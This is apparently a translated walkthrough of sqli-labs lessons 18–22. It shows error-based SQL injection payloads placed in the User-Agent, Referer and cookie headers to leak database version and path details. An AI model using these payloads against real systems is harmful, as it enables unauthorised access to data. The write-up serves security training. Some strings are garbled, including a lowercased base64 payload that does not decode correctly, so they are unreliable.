Less 18:
Topic:
Analysis: Casually enter username and password, the page displays the user agent's information, prompting us to modify the HTTP headers in the user-agent to inject.
TRY:
Tools: Firefox, live HTTP headers
S1: Open Live HTTP Headers and resubmit, live HTTP headers is displayed as follows
S2: Click Replay ..., pop up the new dialog box, modify the User-agent content to: ' and Extractvalue (1, concat (0x7e, (select @ @version), 0x7e)) and ' 1 ' = ' 1, of course, the closure conditions and the previous test method consistent.
S3: Click Repaly, re-view the page, the following: Exposed the system version, other information only need to construct SQL OK!
Less 19:
The analysis of this problem is similar to less 18, this time to modify the HTTP headers in the Referer, if your live HTTP headers not referer, you can write one yourself.
Payload: ' and Extractvalue (1, concat (0x7e, (select @ @basedir), 0x7e)) and ' 1 ' = ' 1
Less 20:
Topic:
Analysis: Cookie Injection
TRY:
Tool: Tamper Data,firefox
S1: Open Tamper Data, turn on the tamper option, reload this page, and then look at the tamper content, it becomes as follows:
S2: Modify the cookie value,
Payload:admin ' and Extractvalue (1, concat (0x7e, (select @ @version), 0x7e)) #
Click OK, then look at the page
Less 21:
Similar to less 20, payload:admin ') and Extractvalue (1, concat (0x7e, (select @ @version), 0x7e)) #, closed in different ways, this time is ')
Less 22:
Similar to less 20, payload is admin "and extractvalue (1, concat (0x7e, (select @ @version), 0x7e)) # Base64 after encryption results: ywrtaw4iigfuzcblehryywn0dmfsdwuomswgy29uy2f0kdb4n2uskhnlbgvjdcbaqhzlcnnpb24pldb4n2upksm=
TRY:
"20171031 in" Sqli-libs less 18-22